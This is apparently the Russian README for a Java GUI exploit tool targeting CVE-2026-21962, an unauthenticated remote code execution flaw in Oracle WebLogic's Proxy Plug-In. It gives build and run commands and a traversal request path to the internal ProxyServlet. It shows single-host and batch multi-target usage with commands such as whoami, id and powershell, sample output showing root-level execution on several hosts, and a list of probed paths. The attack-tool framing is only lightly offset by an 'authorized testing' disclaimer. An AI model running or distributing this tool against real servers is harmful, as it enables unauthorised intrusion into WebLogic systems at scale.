
Java GUI-инструмент для эксплуатации CVE-2026-21962 — неаутентифицированного RCE в Oracle WebLogic Proxy Plug-In, позволяющий выполнение команд на нескольких целях через HTTP.
Java GUI-версия инструмента эксплуатации уязвимости Oracle WebLogic Server Proxy Plug-In RCE (удалённое выполнение кода).
java-version/
├── pom.xml # Файл конфигурации проекта Maven
├── README.md # Документация проекта
├── run.bat # Скрипт запуска для Windows
└── src/
└── main/
└── java/
└── com/
└── ashwesker/
└── cve202621962/
├── Main.java # Точка входа в программу
├── core/
│ └── Exploit.java # Основная логика эксплуатации
├── gui/
│ └── MainWindow.java # Главное окно GUI
└── util/
└── HttpClient.java # Инструмент HTTP-запросов
Окно программы содержит следующие области:
Область входных параметров (верхняя)
Область кнопок (средняя)
Область журнала выполнения (нижняя левая)
Область вывода команд (нижняя правая)
cd java-version
mvn clean compile
mvn clean package
Собранный JAR-файл находится по адресу: target/cve-2026-21962-1.0.0.jar
Дважды щёлкните файл run.bat для запуска программы
cd java-version
mvn exec:java -Dexec.mainClass="com.ashwesker.cve202621962.Main"
java -jar target/cve-2026-21962-1.0.0.jar
cd java-version
mvn clean compile
java -cp "target/classes;[путь к jar-зависимостям]" com.ashwesker.cve202621962.Main
URL цели:
http://192.168.1.100:7001
Команда:
whoami
URL цели:
http://192.168.1.100:7001
http://192.168.1.101:7001
http://192.168.1.102:7001
https://weblogic.example.com:4443
Команда:
id
Пример вывода:
[*] Начало тестирования уязвимости...
[*] URL цели: http://192.168.1.100:7001
[*] Выполнение команды: id
[*] Тестируемый путь: http://192.168.1.100:7001/weblogic//weblogic/..;/bea_wls_internal/ProxyServlet
[+] Успех! Код состояния: 200
[+] Команда выполнена успешно!
uid=0(root) gid=0(root) groups=0(root)
------------------------------------------------------------
================================================================================
[*] Начало тестирования уязвимости...
[*] URL цели: http://192.168.1.101:7001
[*] Выполнение команды: id
[*] Тестируемый путь: http://192.168.1.101:7001/weblogic//weblogic/..;/bea_wls_internal/ProxyServlet
[+] Успех! Код состояния: 200
[+] Команда выполнена успешно!
uid=0(root) gid=0(root) groups=0(root)
------------------------------------------------------------
После запуска программы введите адрес целевого сервера в текстовом поле "URL цели"
http://target:7001 или https://oracle-server:4443Введите команду для выполнения в поле "Команда"
whoami, id, powershell -c ... и т.д.Нажмите кнопку "Выполнить эксплуатацию" для начала тестирования
Просмотрите "Журнал выполнения" ниже, чтобы узнать о процессе тестирования
Просмотрите "Вывод команд" ниже, чтобы получить результаты выполнения команды
Введите несколько адресов целей в текстовом поле "URL цели", по одному на строку
http://target1:7001
http://target2:7001
https://target3:4443
Введите команду для выполнения в поле "Команда"
Нажмите кнопку "Выполнить эксплуатацию" для начала пакетного тестирования
Программа последовательно протестирует каждую цель, результаты вывода разных целей разделяются с помощью ================ (80 знаков равенства)
Просмотрите "Журнал выполнения" ниже, чтобы узнать о процессе тестирования каждой цели
Просмотрите "Вывод команд" ниже, чтобы получить результаты выполнения команд для всех целей
Программа автоматически тестирует следующие пути:
/weblogic//wl_proxy//bea_wls_internal//_proxy//proxy/⚠️ Предупреждение: этот инструмент предназначен только для авторизованного тестирования безопасности. Несанкционированное использование этого инструмента для атаки на системы является незаконным.
Main.java
Exploit.java
MainWindow.java
HttpClient.java
Этот проект предназначен только для образовательных целей и исследований в области безопасности.